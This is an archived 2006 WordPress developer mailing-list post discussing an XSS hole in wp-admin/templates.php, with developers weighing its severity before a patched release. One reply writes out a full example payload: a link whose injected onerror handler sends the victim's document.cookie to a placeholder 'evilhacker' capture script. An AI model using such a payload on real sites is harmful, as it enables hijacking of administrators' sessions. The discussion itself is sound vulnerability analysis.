[wp-hackers] Xss Vulnerability

Viper007Bond viper at viper007bond.com
Sat Dec 30 05:16:28 GMT 2006


Yes, but that's where this is XSS problem.

For example, I make a comment on your blog like this (I dunno if I could
actually manage to get it into a comment thanks to kses, but it could also
be accomplished by getting you to visit a site where I have the link or
whatever).


<a href="http://yousite.com/wp/wp-admin/templates.php?file=<img
src=""onerror=javascript:document.location.href='http://evilhacker/captureco
okie.php?'+document.cookie;>">Check out this cool site!</a>


If you click it, it'll take you to your admin area and send your cookie
contents to the hacker. Allowing them to get into the admin area of your
site and do as they please.

On 12/29/06, Dougal Campbell <dougal at gunters.org> wrote:
>
> Ryan Boren wrote:
> > On 12/28/06, dabos <daboslab at gmail.com> wrote:
> >>
> >> Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
> >> wp-admin/templates.php ?
> >> [....]
> >
> > For your testing pleasure:
> >
> > http://wordpress.org/beta/wordpress-2.0.6-RC2.zip
>
> Even before the patch, isn't it true that this hole could only be
> exploited by a registered user who already had the 'edit_files'
> privilege set on their profile?
>
> --
> Dougal Campbell <dougal at gunters.org>
> http://dougal.gunters.org/
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>



-- 
Viper007Bond | http://www.viper007bond.com/


More information about the wp-hackers mailing list